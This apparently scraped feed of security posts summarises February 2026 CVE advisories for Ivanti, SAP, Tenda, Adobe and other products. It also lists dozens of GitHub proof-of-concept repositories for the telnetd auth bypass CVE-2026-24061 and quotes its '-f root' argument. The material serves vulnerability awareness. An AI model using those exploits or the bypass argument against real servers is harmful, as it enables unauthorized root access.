🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21345/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##updated 2026-02-10T21:31:42
2 posts
🟠 CVE-2026-21344 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21344/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21344 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21344/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:42
2 posts
🟠 CVE-2026-1507 - High (7.5)
The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1507 - High (7.5)
The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:42
2 posts
🟠 CVE-2026-21349 - High (7.8)
Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21349 - High (7.8)
Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:41
2 posts
🟠 CVE-2026-21353 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21353/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21353 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21353/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:41
2 posts
🟠 CVE-2026-21352 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21352 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T19:29:09.960000
1 posts
🟠 CVE-2026-2139 - High (8.8)
A vulnerability was determined in Tenda TX9 up to 22.03.02.10_multi. Affected by this vulnerability is the function sub_432580 of the file /goform/fast_setting_wifi_set. This manipulation of the argument ssid causes buffer overflow. The attack may...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2139/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:35:16
2 posts
🟠 CVE-2026-1486 - High (8.8)
A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1486/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1486 - High (8.8)
A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1486/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:49
2 posts
New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##updated 2026-02-10T18:30:40
1 posts
RE: https://infosec.exchange/@ozu/116041085922526875
Another another vuln. CVE-2025-52436
##updated 2026-02-10T18:30:34
4 posts
62 repos
https://github.com/monstertsl/CVE-2026-24061
https://github.com/franckferman/CVE_2026_24061_PoC
https://github.com/Good123321-bot/CVE-2026-24061-POC
https://github.com/Ali-brarou/telnest
https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061
https://github.com/SystemVll/CVE-2026-24061
https://github.com/Good123321-bot/good123321-bot.github.io
https://github.com/midox008/CVE-2026-24061
https://github.com/LucasPDiniz/CVE-2026-24061
https://github.com/Gabs-hub/CVE-2026-24061_Lab
https://github.com/XsanFlip/CVE-2026-24061-Scanner
https://github.com/Moxxic1/moxxic1.github.io
https://github.com/buzz075/CVE-2026-24061
https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
https://github.com/infat0x/CVE-2026-24061
https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061
https://github.com/Chocapikk/CVE-2026-24061
https://github.com/xuemian168/CVE-2026-24061
https://github.com/ms0x08-dev/CVE-2026-24061-POC
https://github.com/typeconfused/CVE-2026-24061
https://github.com/leonjza/inetutils-telnetd-auth-bypass
https://github.com/Moxxic1/Tell-Me-Root
https://github.com/cyberpoul/CVE-2026-24061-POC
https://github.com/duy-31/CVE-2026-24061---telnetd
https://github.com/obrunolima1910/CVE-2026-24061
https://github.com/Lingzesec/CVE-2026-24061-GUI
https://github.com/0x7556/CVE-2026-24061
https://github.com/SafeBreach-Labs/CVE-2026-24061
https://github.com/balgan/CVE-2026-24061
https://github.com/yanxinwu946/CVE-2026-24061--telnetd
https://github.com/Mr-Zapi/CVE-2026-24061
https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
https://github.com/ridpath/Terrminus-CVE-2026-2406
https://github.com/Mefhika120/Ashwesker-CVE-2026-24061
https://github.com/JayGLXR/CVE-2026-24061-POC
https://github.com/ibrahmsql/CVE-2026-24061-PoC
https://github.com/r00tuser111/CVE-2026-24061
https://github.com/Parad0x7e/CVE-2026-24061
https://github.com/Alter-N0X/CVE-2026-24061-POC
https://github.com/z3n70/CVE-2026-24061
https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd
https://github.com/SeptembersEND/CVE--2026-24061
https://github.com/hilwa24/CVE-2026-24061
https://github.com/lavabyte/telnet-CVE-2026-24061
https://github.com/madfxr/Twenty-Three-Scanner
https://github.com/shivam-bathla/CVE-2026-24061-setup
https://github.com/X-croot/CVE-2026-24061_POC
https://github.com/BrainBob/CVE-2026-24061
https://github.com/scumfrog/cve-2026-24061
https://github.com/TryA9ain/CVE-2026-24061
https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester
https://github.com/hackingyseguridad/root
https://github.com/punitdarji/telnetd-cve-2026-24061
https://github.com/novitahk/Exploit-CVE-2026-24061
https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root
https://github.com/m3ngx1ng/cve_2026_24061_cli
https://github.com/killsystema/scan-cve-2026-24061
https://github.com/cumakurt/tscan
https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
https://github.com/obrunolima1910/obrunolima1910.github.io
I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…
The day the telnet died
On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.
https://www.labs.greynoise.io/grimoire/2026-02-10-telnet-falls-silent/
##~/CVE/CVE-2026-24061_telnetd
Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...
🔗️ [Lobsec] https://link.is.it/6L9jY6
##I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…
The day the telnet died
On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.
https://www.labs.greynoise.io/grimoire/2026-02-10-telnet-falls-silent/
##~/CVE/CVE-2026-24061_telnetd
Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...
🔗️ [Lobsec] https://link.is.it/6L9jY6
##updated 2026-02-10T18:23:11.493000
1 posts
🟠 CVE-2025-70963 - High (7.6)
Gophish <=0.12.1 is vulnerable to Incorrect Access Control. The administrative dashboard exposes each user’s long-lived API key directly inside the rendered HTML/JavaScript of the page on every login. This makes permanent API credentials acce...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70963/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:30:34
4 posts
🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:30:26
1 posts
🟠 CVE-2026-2203 - High (8.8)
A flaw has been found in Tenda AC8 16.03.33.05. Affected by this vulnerability is an unknown functionality of the file /goform/fast_setting_wifi_set of the component Embedded Httpd Service. This manipulation of the argument timeZone causes buffer ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2203/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
8 posts
‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
🟠 CVE-2026-23717 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23717 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
🟠 CVE-2026-22923 - High (7.8)
A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22923/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-22923 - High (7.8)
A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22923/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
1 repos
🟠 CVE-2026-2268 - High (7.5)
The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2268/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2268 - High (7.5)
The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2268/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
7 posts
🚨 CRITICAL vuln: CVE-2026-2096 in Flowring Agentflow (all versions). Unauthenticated attackers can read, modify, or delete DB contents due to authentication bypass. No fix yet — restrict access! https://radar.offseq.com/threat/cve-2026-2096-cwe-288-authentication-bypass-using--10f90ea1 #OffSeq #Vulnerability #Agentflow #InfoSec
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
🟠 CVE-2026-2093 - High (7.5)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2093/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2093 - High (7.5)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2093/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
4 posts
🟠 CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
⚠️ CRITICAL: CVE-2026-25893 in frangoteam FUXA (<1.2.10) lets unauthenticated attackers gain admin rights via the heartbeat API & execute code. Immediate patching to 1.2.10+ is essential for all ICS/SCADA deployments. https://radar.offseq.com/threat/cve-2026-25893-cwe-285-improper-authorization-in-f-a5914f35 #OffSeq #ICS #SCADA #Vuln
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2025-15310 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15310/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
1 repos
🟠 CVE-2026-25807 - High (8.8)
ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure complex environments. Prior to 9.0.3, the P2P terminal sharing feature (share start) opens a TCP socket on port 5757 without any authentication mechanism. Any remote ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25807/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
1 repos
https://github.com/mbanyamer/CVE-2026-25961-SumatraPDF-3.5.0---3.5.2-RCE
🟠 CVE-2026-25961 - High (7.5)
SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, SumatraPDF's update mechanism disables TLS hostname verification (INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and executes installers without signature checks. A network attacker w...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25961/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:11:28.863000
1 posts
🟠 CVE-2026-2066 - High (8.8)
A weakness has been identified in UTT 进取 520W 1.7.7-180627. This affects the function strcpy of the file /goform/formIpGroupConfig. Executing a manipulation of the argument groupName can lead to buffer overflow. The attack can be launched remo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2066/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:07:30.390000
1 posts
🟠 CVE-2026-2202 - High (8.8)
A vulnerability was detected in Tenda AC8 16.03.33.05. Affected is the function fromSetWifiGusetBasic of the file /goform/WifiGuestSet of the component httpd. The manipulation of the argument shareSpeed results in buffer overflow. The attack may b...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2202/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:02:32.033000
2 posts
🟠 CVE-2026-24684 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24684/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24684 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24684/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T14:54:35.470000
1 posts
7 repos
https://github.com/sec-dojo-com/CVE-2026-21858
https://github.com/bgarz929/Ashwesker-CVE-2026-21858
https://github.com/MOGMUNI/CVE-2026-21858
https://github.com/Alhakim88/CVE-2026-21858
🟠 CVE-2026-2185 - High (8.8)
A flaw has been found in Tenda RX3 16.03.13.11. This issue affects the function set_device_name of the file /goform/setBlackRule of the component MAC Filtering Configuration Endpoint. This manipulation of the argument devName/mac causes stack-base...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2185/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:34
2 posts
🟠 CVE-2026-25656 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25656 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:34
2 posts
🟠 CVE-2026-23720 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23720 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:33
2 posts
🟠 CVE-2026-25655 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25655/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25655 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25655/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:28
2 posts
🟠 CVE-2026-23719 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23719 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:28
2 posts
🟠 CVE-2026-23718 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23718/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23718 - High (7.8)
